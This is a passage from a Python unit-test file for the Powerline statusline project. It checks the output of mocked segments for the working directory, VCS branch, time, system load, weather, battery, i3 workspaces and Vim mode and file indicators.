                {'contents': 'fo/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
            ])
            cwd[0] = '/etc'
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, use_path_separator=False), [
                {'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'etc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
            ])
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, use_path_separator=True), [
                {'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
                {'contents': 'etc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']},
            ])
            cwd[0] = '/'
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, use_path_separator=False), [
                {'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
            ])
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, use_path_separator=True), [
                {'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']},
            ])
            # errno 2 (ENOENT, directory deleted) is handled gracefully ...
            ose = OSError()
            ose.errno = 2
            cwd[0] = ose
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2), [
                {'contents': '[not found]', 'divider_highlight_group': 'cwd:divider', 'highlight_groups': ['cwd:current_folder', 'cwd'], 'draw_inner_divider': True}
            ])
            # ... while other OSErrors and unrelated exceptions propagate.
            cwd[0] = OSError()
            self.assertRaises(OSError, self.module.cwd, pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2)
            cwd[0] = ValueError()
            self.assertRaises(ValueError, self.module.cwd, pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2)

    def test_virtualenv(self):
        """virtualenv(): shows the env's basename, hidden when unset."""
        pl = Pl()
        with replace_env('VIRTUAL_ENV', '/abc/def/ghi') as segment_info:
            self.assertEqual(self.module.virtualenv(pl=pl, segment_info=segment_info), 'ghi')
            segment_info['environ'].pop('VIRTUAL_ENV')
            self.assertEqual(self.module.virtualenv(pl=pl, segment_info=segment_info), None)

    def test_environment(self):
        """environment(): echoes a variable's value, None when unset."""
        pl = Pl()
        variable = 'FOO'
        value = 'bar'
        with replace_env(variable, value) as segment_info:
            self.assertEqual(self.module.environment(pl=pl, segment_info=segment_info, variable=variable), value)
            segment_info['environ'].pop(variable)
            self.assertEqual(self.module.environment(pl=pl, segment_info=segment_info, variable=variable), None)
class TestVcs(TestCommon):
    """Tests for powerline.segments.common.vcs."""

    module_name = 'vcs'

    def test_branch(self):
        """branch(): status colouring and ignore_statuses handling."""
        pl = Pl()
        create_watcher = get_fallback_create_watcher()
        segment_info = {'getcwd': os.getcwd}
        # All calls share pl and the watcher; only per-call kwargs vary.
        branch = partial(self.module.branch, pl=pl, create_watcher=create_watcher)
        # Clean tree: branch_clean group only when status_colors is on.
        with replace_attr(self.module, 'guess', get_dummy_guess(status=lambda: None, directory='/tmp/tests')):
            with replace_attr(self.module, 'tree_status', lambda repo, pl: None):
                self.assertEqual(branch(segment_info=segment_info, status_colors=False), [{
                    'highlight_groups': ['branch'],
                    'contents': 'tests',
                    'divider_highlight_group': None
                }])
                self.assertEqual(branch(segment_info=segment_info, status_colors=True), [{
                    'contents': 'tests',
                    'highlight_groups': ['branch_clean', 'branch'],
                    'divider_highlight_group': None
                }])
        # Dirty tree ('D ' status): branch_dirty group with status_colors.
        with replace_attr(self.module, 'guess', get_dummy_guess(status=lambda: 'D ', directory='/tmp/tests')):
            with replace_attr(self.module, 'tree_status', lambda repo, pl: 'D '):
                self.assertEqual(branch(segment_info=segment_info, status_colors=False), [{
                    'highlight_groups': ['branch'],
                    'contents': 'tests',
                    'divider_highlight_group': None
                }])
                self.assertEqual(branch(segment_info=segment_info, status_colors=True), [{
                    'contents': 'tests',
                    'highlight_groups': ['branch_dirty', 'branch'],
                    'divider_highlight_group': None
                }])
            # NOTE: deliberately outside the tree_status replacement above —
            # without status_colors the segment must not need tree_status.
            self.assertEqual(branch(segment_info=segment_info, status_colors=False), [{
                'highlight_groups': ['branch'],
                'contents': 'tests',
                'divider_highlight_group': None
            }])
        # No repository detected: segment yields nothing.
        with replace_attr(self.module, 'guess', lambda path, create_watcher: None):
            self.assertEqual(branch(segment_info=segment_info, status_colors=False), None)
        # ignore_statuses: listed statuses count as clean.
        with replace_attr(self.module, 'guess', get_dummy_guess(status=lambda: 'U')):
            with replace_attr(self.module, 'tree_status', lambda repo, pl: 'U'):
                self.assertEqual(branch(segment_info=segment_info, status_colors=False, ignore_statuses=['U']), [{
                    'highlight_groups': ['branch'],
                    'contents': 'tests',
                    'divider_highlight_group': None
                }])
                self.assertEqual(branch(segment_info=segment_info, status_colors=True, ignore_statuses=['DU']), [{
                    'highlight_groups': ['branch_dirty', 'branch'],
                    'contents': 'tests',
                    'divider_highlight_group': None
                }])
                self.assertEqual(branch(segment_info=segment_info, status_colors=True), [{
                    'highlight_groups': ['branch_dirty', 'branch'],
                    'contents': 'tests',
                    'divider_highlight_group': None
                }])
                self.assertEqual(branch(segment_info=segment_info, status_colors=True, ignore_statuses=['U']), [{
                    'highlight_groups': ['branch_clean', 'branch'],
                    'contents': 'tests',
                    'divider_highlight_group': None
                }])
class TestTime(TestCommon):
    """Tests for powerline.segments.common.time."""

    module_name = 'time'

    def test_date(self):
        """date(): the strftime format string is passed straight through."""
        pl = Pl()
        # Args(now=...) stands in for the datetime class; strftime echoes the
        # format so the assertions can see exactly which format was used.
        fake_datetime = Args(now=lambda: Args(strftime=lambda fmt: fmt))
        with replace_attr(self.module, 'datetime', fake_datetime):
            self.assertEqual(self.module.date(pl=pl), [{'contents': '%Y-%m-%d', 'highlight_groups': ['date'], 'divider_highlight_group': None}])
            self.assertEqual(self.module.date(pl=pl, format='%H:%M', istime=True), [{'contents': '%H:%M', 'highlight_groups': ['time', 'date'], 'divider_highlight_group': 'time:divider'}])

    def test_fuzzy_time(self):
        """fuzzy_time(): wording for various clock values, ASCII vs Unicode."""
        clock = Args(hour=0, minute=45)
        pl = Pl()

        def fuzzy(**kwargs):
            # Shorthand: every call shares the same pl.
            return self.module.fuzzy_time(pl=pl, **kwargs)

        with replace_attr(self.module, 'datetime', Args(now=lambda: clock)):
            self.assertEqual(fuzzy(), 'quarter to one')
            clock.hour = 23
            clock.minute = 59
            self.assertEqual(fuzzy(), 'round about midnight')
            clock.minute = 33
            self.assertEqual(fuzzy(), 'twenty-five to twelve')
            clock.minute = 60
            self.assertEqual(fuzzy(), "twelve o'clock")
            clock.minute = 33
            self.assertEqual(fuzzy(unicode_text=False), 'twenty-five to twelve')
            clock.minute = 60
            self.assertEqual(fuzzy(unicode_text=False), "twelve o'clock")
            # unicode_text=True switches to U+2010 hyphen and U+2019 apostrophe.
            clock.minute = 33
            self.assertEqual(fuzzy(unicode_text=True), 'twenty‐five to twelve')
            clock.minute = 60
            self.assertEqual(fuzzy(unicode_text=True), 'twelve o’clock')
class TestSys(TestCommon):
    """Tests for powerline.segments.common.sys."""

    module_name = 'sys'

    def test_uptime(self):
        """uptime(): formatting, shorten_len and unsupported platforms."""
        pl = Pl()
        # 259200 s = exactly 3 days: zero-valued units are dropped.
        with replace_attr(self.module, '_get_uptime', lambda: 259200):
            self.assertEqual(self.module.uptime(pl=pl), [{'contents': '3d', 'divider_highlight_group': 'background:divider'}])
        # 93784 s = 1d 2h 3m 4s; default shorten_len keeps three units.
        with replace_attr(self.module, '_get_uptime', lambda: 93784):
            self.assertEqual(self.module.uptime(pl=pl), [{'contents': '1d 2h 3m', 'divider_highlight_group': 'background:divider'}])
            self.assertEqual(self.module.uptime(pl=pl, shorten_len=4), [{'contents': '1d 2h 3m 4s', 'divider_highlight_group': 'background:divider'}])
        with replace_attr(self.module, '_get_uptime', lambda: 65536):
            self.assertEqual(self.module.uptime(pl=pl), [{'contents': '18h 12m 16s', 'divider_highlight_group': 'background:divider'}])
            self.assertEqual(self.module.uptime(pl=pl, shorten_len=2), [{'contents': '18h 12m', 'divider_highlight_group': 'background:divider'}])
            self.assertEqual(self.module.uptime(pl=pl, shorten_len=1), [{'contents': '18h', 'divider_highlight_group': 'background:divider'}])

        # Platforms without uptime support: the segment must yield nothing.
        def _get_uptime():
            raise NotImplementedError
        with replace_attr(self.module, '_get_uptime', _get_uptime):
            self.assertEqual(self.module.uptime(pl=pl), None)

    def test_system_load(self):
        """system_load(): gradient levels relative to CPU count and thresholds."""
        pl = Pl()
        with replace_module_module(self.module, 'os', getloadavg=lambda: (7.5, 3.5, 1.5)):
            with replace_attr(self.module, '_cpu_count', lambda: 2):
                self.assertEqual(self.module.system_load(pl=pl), [
                    {'contents': '7.5 ', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 100},
                    {'contents': '3.5 ', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 75.0},
                    {'contents': '1.5', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 0}
                ])
                # Custom format rounds values; tightened thresholds shift
                # every gradient level upward.
                self.assertEqual(self.module.system_load(pl=pl, format='{avg:.0f}', threshold_good=0, threshold_bad=1), [
                    {'contents': '8 ', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 100},
                    {'contents': '4 ', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 100},
                    {'contents': '2', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 75.0}
                ])

    def test_cpu_load_percent(self):
        """cpu_load_percent(): default and custom format strings."""
        # The real psutil must be importable even though cpu_percent is stubbed.
        try:
            __import__('psutil')
        except ImportError as e:
            raise SkipTest('Failed to import psutil: {0}'.format(e))
        pl = Pl()
        with replace_module_module(self.module, 'psutil', cpu_percent=lambda **kwargs: 52.3):
            self.assertEqual(self.module.cpu_load_percent(pl=pl), [{
                'contents': '52%',
                'gradient_level': 52.3,
                'highlight_groups': ['cpu_load_percent_gradient', 'cpu_load_percent'],
            }])
            self.assertEqual(self.module.cpu_load_percent(pl=pl, format='{0:.1f}%'), [{
                'contents': '52.3%',
                'gradient_level': 52.3,
                'highlight_groups': ['cpu_load_percent_gradient', 'cpu_load_percent'],
            }])
class TestWthr(TestCommon):
    """Tests for powerline.segments.common.wthr (weather)."""

    module_name = 'wthr'

    def test_weather(self):
        """weather(): icons, units, gradient range and location queries.

        urllib_read is a canned-response stub, so the reported condition is
        always cloudy and the temperature -9°C (19°C for Moscow below).
        """
        pl = Pl()
        with replace_attr(self.module, 'urllib_read', urllib_read):
            self.assertEqual(self.module.weather(pl=pl), [
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 30.0}
            ])
            # gradient_level is -9°C mapped linearly onto [coldest, hottest].
            self.assertEqual(self.module.weather(pl=pl, temp_coldest=0, temp_hottest=100), [
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 0}
            ])
            self.assertEqual(self.module.weather(pl=pl, temp_coldest=-100, temp_hottest=-50), [
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 100}
            ])
            # Icon overrides: the more specific condition key wins per call.
            self.assertEqual(self.module.weather(pl=pl, icons={'cloudy': 'o'}), [
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'o '},
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 30.0}
            ])
            self.assertEqual(self.module.weather(pl=pl, icons={'partly_cloudy_day': 'x'}), [
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'x '},
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 30.0}
            ])
            # Unit conversion: -9°C is 16°F / 264K.
            self.assertEqual(self.module.weather(pl=pl, unit='F'), [
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '16°F', 'gradient_level': 30.0}
            ])
            self.assertEqual(self.module.weather(pl=pl, unit='K'), [
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '264K', 'gradient_level': 30.0}
            ])
            self.assertEqual(self.module.weather(pl=pl, temp_format='{temp:.1e}C'), [
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9.0e+00C', 'gradient_level': 30.0}
            ])
        # Lifecycle: startup with a fixed location, query another location
        # per call, then shut the background updater down.
        with replace_attr(self.module, 'urllib_read', urllib_read):
            self.module.weather.startup(pl=pl, location_query='Meppen,06,DE')
            self.assertEqual(self.module.weather(pl=pl), [
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 30.0}
            ])
            self.assertEqual(self.module.weather(pl=pl, location_query='Moscow,RU'), [
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
                {'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '19°C', 'gradient_level': 70.0}
            ])
            self.module.weather.shutdown()
class TestI3WM(TestCase):
    """Tests for the i3 window manager segments."""

    def test_workspaces(self):
        """workspaces(): highlight groups, only_show filter, strip and output.

        The conn stub re-creates the workspace iterator on every call (the
        lambda builds a fresh list each time), so repeated queries work.
        """
        pl = Pl()
        with replace_attr(i3wm, 'conn', Args(get_workspaces=lambda: iter([
            {'name': '1: w1', 'output': 'LVDS1', 'focused': False, 'urgent': False, 'visible': False},
            {'name': '2: w2', 'output': 'LVDS1', 'focused': False, 'urgent': False, 'visible': True},
            {'name': '3: w3', 'output': 'HDMI1', 'focused': False, 'urgent': True, 'visible': True},
            {'name': '4: w4', 'output': 'DVI01', 'focused': True, 'urgent': True, 'visible': True},
        ]))):
            # Highlight groups accumulate: focused implies urgent implies
            # visible implies the base 'workspace' group.
            self.assertEqual(i3wm.workspaces(pl=pl), [
                {'contents': '1: w1', 'highlight_groups': ['workspace']},
                {'contents': '2: w2', 'highlight_groups': ['w_visible', 'workspace']},
                {'contents': '3: w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
                {'contents': '4: w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
            ])
            # only_show=None is equivalent to showing everything.
            self.assertEqual(i3wm.workspaces(pl=pl, only_show=None), [
                {'contents': '1: w1', 'highlight_groups': ['workspace']},
                {'contents': '2: w2', 'highlight_groups': ['w_visible', 'workspace']},
                {'contents': '3: w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
                {'contents': '4: w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
            ])
            self.assertEqual(i3wm.workspaces(pl=pl, only_show=['focused', 'urgent']), [
                {'contents': '3: w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
                {'contents': '4: w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
            ])
            self.assertEqual(i3wm.workspaces(pl=pl, only_show=['visible']), [
                {'contents': '2: w2', 'highlight_groups': ['w_visible', 'workspace']},
                {'contents': '3: w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
                {'contents': '4: w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
            ])
            # strip=3 removes the first three characters ('N: ' prefix).
            self.assertEqual(i3wm.workspaces(pl=pl, only_show=['visible'], strip=3), [
                {'contents': 'w2', 'highlight_groups': ['w_visible', 'workspace']},
                {'contents': 'w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
                {'contents': 'w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
            ])
            # output restricts workspaces to those on the given monitor.
            self.assertEqual(i3wm.workspaces(pl=pl, only_show=['focused', 'urgent'], output='DVI01'), [
                {'contents': '4: w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
            ])
            self.assertEqual(i3wm.workspaces(pl=pl, only_show=['visible'], output='HDMI1'), [
                {'contents': '3: w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
            ])
            self.assertEqual(i3wm.workspaces(pl=pl, only_show=['visible'], strip=3, output='LVDS1'), [
                {'contents': 'w2', 'highlight_groups': ['w_visible', 'workspace']},
            ])

    def test_mode(self):
        """mode(): default mode is hidden; names remaps mode display text."""
        pl = Pl()
        self.assertEqual(i3wm.mode(pl=pl, segment_info={'mode': 'default'}), None)
        self.assertEqual(i3wm.mode(pl=pl, segment_info={'mode': 'test'}), 'test')
        self.assertEqual(i3wm.mode(pl=pl, segment_info={'mode': 'default'}, names={'default': 'test'}), 'test')
        self.assertEqual(i3wm.mode(pl=pl, segment_info={'mode': 'test'}, names={'default': 'test', 'test': 't'}), 't')
class TestMail(TestCommon):
    """Placeholder tests for the mail segment module."""

    module_name = 'mail'

    def test_email_imap_alert(self):
        # TODO: needs an IMAP server fixture before a real test can be written.
        pass
class TestPlayers(TestCommon):
    """Placeholder tests for the media-player segment module."""

    module_name = 'players'

    def test_now_playing(self):
        # TODO: needs a mock player backend before a real test can be written.
        pass
class TestBat(TestCommon):
    """Tests for the battery segment module (segment name: 'bat')."""

    module_name = 'bat'

    def test_battery(self):
        # battery() rendering with the AC adapter offline: percentage text,
        # custom format, and the gamified heart-bar variants.
        pl = Pl()

        def _get_battery_status(pl):
            # Stub status: 86% capacity, not on AC power.
            return 86, False

        with replace_attr(self.module, '_get_battery_status', _get_battery_status):
            self.assertEqual(self.module.battery(pl=pl), [{
                'contents': ' 86%',
                'highlight_groups': ['battery_gradient', 'battery'],
                'gradient_level': 14,
            }])
            self.assertEqual(self.module.battery(pl=pl, format='{capacity:.2f}'), [{
                'contents': '0.86',
                'highlight_groups': ['battery_gradient', 'battery'],
                'gradient_level': 14,
            }])
            self.assertEqual(self.module.battery(pl=pl, steps=7), [{
                'contents': ' 86%',
                'highlight_groups': ['battery_gradient', 'battery'],
                'gradient_level': 14,
            }])
            # Gamified rendering: AC-state indicator, full hearts, empty hearts.
            self.assertEqual(self.module.battery(pl=pl, gamify=True), [
                {
                    'contents': ' ',
                    'draw_inner_divider': False,
                    'highlight_groups': ['battery_offline', 'battery_ac_state', 'battery_gradient', 'battery'],
                    'gradient_level': 0
                },
                {
                    'contents': 'OOOO',
                    'draw_inner_divider': False,
                    'highlight_groups': ['battery_full', 'battery_gradient', 'battery'],
                    'gradient_level': 0
                },
                {
                    'contents': 'O',
                    'draw_inner_divider': False,
                    'highlight_groups': ['battery_empty', 'battery_gradient', 'battery'],
                    'gradient_level': 100
                }
            ])
            # Custom heart glyphs; note steps is deliberately passed as a string.
            self.assertEqual(self.module.battery(pl=pl, gamify=True, full_heart='+', empty_heart='-', steps='10'), [
                {
                    'contents': ' ',
                    'draw_inner_divider': False,
                    'highlight_groups': ['battery_offline', 'battery_ac_state', 'battery_gradient', 'battery'],
                    'gradient_level': 0
                },
                {
                    'contents': '++++++++',
                    'draw_inner_divider': False,
                    'highlight_groups': ['battery_full', 'battery_gradient', 'battery'],
                    'gradient_level': 0
                },
                {
                    'contents': '--',
                    'draw_inner_divider': False,
                    'highlight_groups': ['battery_empty', 'battery_gradient', 'battery'],
                    'gradient_level': 100
                }
            ])

    def test_battery_with_ac_online(self):
        # The *online* indicator string is prepended when AC power is present.
        pl = Pl()

        def _get_battery_status(pl):
            return 86, True

        with replace_attr(self.module, '_get_battery_status', _get_battery_status):
            self.assertEqual(self.module.battery(pl=pl, online='C', offline=' '), [
                {
                    'contents': 'C 86%',
                    'highlight_groups': ['battery_gradient', 'battery'],
                    'gradient_level': 14,
                }])

    def test_battery_with_ac_offline(self):
        # The *offline* indicator string is used when not on AC power.
        pl = Pl()

        def _get_battery_status(pl):
            return 86, False

        with replace_attr(self.module, '_get_battery_status', _get_battery_status):
            self.assertEqual(self.module.battery(pl=pl, online='C', offline=' '), [
                {
                    'contents': ' 86%',
                    'highlight_groups': ['battery_gradient', 'battery'],
                    'gradient_level': 14,
                }])
class TestVim(TestCase):
    """Tests for the Vim statusline segments (powerline.segments.vim).

    setUpClass() prepends tests/path to sys.path so the mock 'vim' module is
    imported instead of the real one; the vim_module fixture drives buffer,
    mode and cursor state.
    """

    def test_mode(self):
        # mode() text for normal/insert/visual-block modes, with overrides.
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info), 'NORMAL')
        self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info, override={'i': 'INS'}), 'NORMAL')
        self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info, override={'n': 'NORM'}), 'NORM')
        with vim_module._with('mode', 'i') as segment_info:
            self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info), 'INSERT')
        # chr(ord('V') - 0x40) is CTRL-V, i.e. visual-block mode.
        with vim_module._with('mode', chr(ord('V') - 0x40)) as segment_info:
            self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info), 'V-BLCK')
            self.assertEqual(self.vim.mode(pl=pl, segment_info=segment_info, override={'^V': 'VBLK'}), 'VBLK')

    def test_visual_range(self):
        # visual_range() output for each visual/select mode variant; 'vpos'
        # moves the visual-selection anchor.
        pl = Pl()
        vr = partial(self.vim.visual_range, pl=pl)
        vim_module.current.window.cursor = [0, 0]
        try:
            with vim_module._with('mode', 'i') as segment_info:
                self.assertEqual(vr(segment_info=segment_info), '')
            with vim_module._with('mode', '^V') as segment_info:
                self.assertEqual(vr(segment_info=segment_info), '1 x 1')
                with vim_module._with('vpos', line=5, col=5, off=0):
                    self.assertEqual(vr(segment_info=segment_info), '5 x 5')
                with vim_module._with('vpos', line=5, col=4, off=0):
                    self.assertEqual(vr(segment_info=segment_info), '5 x 4')
            with vim_module._with('mode', '^S') as segment_info:
                self.assertEqual(vr(segment_info=segment_info), '1 x 1')
                with vim_module._with('vpos', line=5, col=5, off=0):
                    self.assertEqual(vr(segment_info=segment_info), '5 x 5')
                with vim_module._with('vpos', line=5, col=4, off=0):
                    self.assertEqual(vr(segment_info=segment_info), '5 x 4')
            with vim_module._with('mode', 'V') as segment_info:
                self.assertEqual(vr(segment_info=segment_info), 'L:1')
                with vim_module._with('vpos', line=5, col=5, off=0):
                    self.assertEqual(vr(segment_info=segment_info), 'L:5')
                with vim_module._with('vpos', line=5, col=4, off=0):
                    self.assertEqual(vr(segment_info=segment_info), 'L:5')
            with vim_module._with('mode', 'S') as segment_info:
                self.assertEqual(vr(segment_info=segment_info), 'L:1')
                with vim_module._with('vpos', line=5, col=5, off=0):
                    self.assertEqual(vr(segment_info=segment_info), 'L:5')
                with vim_module._with('vpos', line=5, col=4, off=0):
                    self.assertEqual(vr(segment_info=segment_info), 'L:5')
            with vim_module._with('mode', 'v') as segment_info:
                self.assertEqual(vr(segment_info=segment_info), 'C:1')
                with vim_module._with('vpos', line=5, col=5, off=0):
                    self.assertEqual(vr(segment_info=segment_info), 'L:5')
                with vim_module._with('vpos', line=5, col=4, off=0):
                    self.assertEqual(vr(segment_info=segment_info), 'L:5')
            with vim_module._with('mode', 's') as segment_info:
                self.assertEqual(vr(segment_info=segment_info), 'C:1')
                with vim_module._with('vpos', line=5, col=5, off=0):
                    self.assertEqual(vr(segment_info=segment_info), 'L:5')
                with vim_module._with('vpos', line=5, col=4, off=0):
                    self.assertEqual(vr(segment_info=segment_info), 'L:5')
        finally:
            vim_module._close(1)

    def test_modified_indicator(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.modified_indicator(pl=pl, segment_info=segment_info), None)
        segment_info['buffer'][0] = 'abc'
        try:
            self.assertEqual(self.vim.modified_indicator(pl=pl, segment_info=segment_info), '+')
            self.assertEqual(self.vim.modified_indicator(pl=pl, segment_info=segment_info, text='-'), '-')
        finally:
            vim_module._bw(segment_info['bufnr'])

    def test_paste_indicator(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.paste_indicator(pl=pl, segment_info=segment_info), None)
        with vim_module._with('options', paste=1):
            self.assertEqual(self.vim.paste_indicator(pl=pl, segment_info=segment_info), 'PASTE')
            self.assertEqual(self.vim.paste_indicator(pl=pl, segment_info=segment_info, text='P'), 'P')

    def test_readonly_indicator(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.readonly_indicator(pl=pl, segment_info=segment_info), None)
        with vim_module._with('bufoptions', readonly=1):
            self.assertEqual(self.vim.readonly_indicator(pl=pl, segment_info=segment_info), 'RO')
            self.assertEqual(self.vim.readonly_indicator(pl=pl, segment_info=segment_info, text='L'), 'L')

    def test_file_scheme(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.file_scheme(pl=pl, segment_info=segment_info), None)
        with vim_module._with('buffer', '/tmp/’’/abc') as segment_info:
            self.assertEqual(self.vim.file_scheme(pl=pl, segment_info=segment_info), None)
        with vim_module._with('buffer', 'zipfile:/tmp/abc.zip::abc/abc.vim') as segment_info:
            self.assertEqual(self.vim.file_scheme(pl=pl, segment_info=segment_info), 'zipfile')

    def test_file_directory(self):
        # Directory display: unicode names, undecodable bytes, $HOME
        # collapsing to '~', and scheme-prefixed buffer names.
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), None)
        with replace_env('HOME', '/home/foo', os.environ):
            with vim_module._with('buffer', '/tmp/’’/abc') as segment_info:
                self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '/tmp/’’/')
            with vim_module._with('buffer', b'/tmp/\xFF\xFF/abc') as segment_info:
                self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '/tmp/<ff><ff>/')
            with vim_module._with('buffer', '/tmp/abc') as segment_info:
                self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '/tmp/')
                os.environ['HOME'] = '/tmp'
                self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '~/')
            with vim_module._with('buffer', 'zipfile:/tmp/abc.zip::abc/abc.vim') as segment_info:
                self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info, remove_scheme=False), 'zipfile:/tmp/abc.zip::abc/')
                self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info, remove_scheme=True), '/tmp/abc.zip::abc/')
                self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '/tmp/abc.zip::abc/')
                os.environ['HOME'] = '/tmp'
                # '~' collapsing must not apply to scheme-prefixed paths.
                self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info, remove_scheme=False), 'zipfile:/tmp/abc.zip::abc/')
                self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info, remove_scheme=True), '/tmp/abc.zip::abc/')
                self.assertEqual(self.vim.file_directory(pl=pl, segment_info=segment_info), '/tmp/abc.zip::abc/')

    def test_file_name(self):
        pl = Pl()
        segment_info = vim_module._get_segment_info()
        self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info), None)
        self.assertEqual(self.vim.file_name(pl=pl, segment_info=segment_info, display_no_file=True), [
            {'contents': '[No file]', 'highlight_groups': ['file_name_no_file', 'file_name']}
